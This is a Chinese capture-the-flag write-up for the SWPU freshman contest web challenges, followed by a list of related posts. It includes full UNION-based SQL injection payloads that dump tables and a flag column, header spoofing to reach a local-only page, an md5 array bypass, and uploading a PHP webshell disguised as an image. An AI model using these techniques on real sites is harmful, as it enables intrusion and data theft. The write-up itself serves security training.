NSSCTF-SWPU新生赛
SWPU新生赛
Web
gift_F12
右键查看源代码
caidao
页面就有木马密码,蚁剑连接即可
flag在/目录
jicao
源码:
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
json_decode,是对json格式的字符串进行编码
json传入{“x”:”wllm”}
id传入wllmNB即可
Do_you_know_http
提示使用WLLM浏览器
抓包修改ua头,发现a.php
访问a.php,提示只能在本地访问
抓包使用xff修改为127.0.0.1,发现secretttt.php
访问即可获得flag
easy_md5
源码:
<?php highlight_file(__FILE__);include 'flag2.php';if (isset($_GET['name']) && isset($_POST['password'])){$name = $_GET['name'];$password = $_POST['password'];if ($name != $password && md5($name) == md5($password)){echo $flag;}else {echo "wrong!";}}
else {echo 'wrong!';
}
?>
md5数组绕过即可
easy_sql
标签提示参数是wllm
获得表:?wllm=-1’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()–+
获得列:?wllm=-1’union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘test_tb’–+
获得flag:?wllm=-1’union select 1,group_concat(flag),3 from test_tb–+
注:不能用qlmap,跑出来是假的flag(不要当脚本小子)
easyupload1.0
将木马改成.png格式,然后抓包改回php即可
蚁剑连接获得flag
获得了个假的flag………
NSSCTF-SWPU新生赛相关推荐
- SWPU新生赛2021 Crypto部分WriteUp
第一波放题 crypto1 直接谷歌搜e1e2 = 3087 n = p*q,找到striving的博客,不愧是密码神 由于striving的旧博客域名已过期,因此就不放密码神的博客了 c1= 463 ...
- [SWPUCTF 2022 新生赛]ez_rce、[NSSRound#4 SWPU]ez_rce、[UUCTF 2022 新生赛]ez_rce
第一题:[SWPUCTF 2022 新生赛]ez_rce已解决 1.看一下,啥也没有,找一下robots.txt 2.访问一下,/NSS/index.php 3.thinkphp,直接找个工具嗦吧,咱 ...
- [SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
[SWPUCTF 2021 新生赛]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_d ...
- CTF Crypto RSA合集(新生赛难度)
食用简介 下面是本人新生赛时遇到的一些RSA密码题,题目名后大概写有类型便于查找 题目较多可以选择性食用 1.buuctf RSA 题目:在一次RSA密钥对生成中,假设p=473398607161,q ...
- [SWPUCTF 2021 新生赛]easyrce
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ...
- [SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 考点 反序列化 一.题目 打开题目发现如下代码 <?phpheader("Content-type:text/html;char ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- [SUCTF2018]babyre [ACTF新生赛2020]fungame
文章目录 [SUCTF2018]babyre 惯用思维 常人思维 GAMEOVER [ACTF新生赛2020]fungame int __cdecl sub_401340(int a1) int __ ...
- BUUCTF Web [ACTF2020 新生赛]Exec
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
最新文章
- 剑指offer:整数中1出现的次数(从1到n整数中1出现的次数)
- 面向技术编程,面向工资编程,面向用户编程?
- Ubuntu查看端口占用情况
- 总结一下模型工程化部署的几种方式
- sap权限激活_宅出职场含金量!SAP 解决方案培训课程线上免费学
- 如何在ui5 xml view中使用嵌入的自定义css style
- python卸载opencv包_Ubuntu16.04卸载opencv2.4.9并安装opencv3.2.0+contrib
- python的语句_Python的语句
- sim7020c功耗_SIM7020C物联网NB-IOT模块 simcom代理
- mdb转换为db文件
- [转] 基于MBR 的bootkit的进展 鬼影-TDL4-BMW
- 拉线自动行走机器人_架空输电线路自动巡线机器人
- vue-element-admin-master 在线教育 - 【4】你用 POI,我已经用 EasyExcel 了+课程科目管理
- CGAL预定义内核转换的问题
- php试卷分析,试卷分析常用统计指标
- 名编辑电子杂志大师教程 | 如何调用外部本地文件?
- 【游戏开发小技】Unity中实现Dota里的角色技能地面贴花效果(URP | ShaderGraph | Decal)
- C语言常见字符串函数、字符分类函数与内存函数的使用
- (详细版Win10+Pycharm)YOLOX——训练自己的VOC2007数据集,以NWPU VHR-10 dataset为例
- 编写一个移动的游戏背景(含素材视频教程)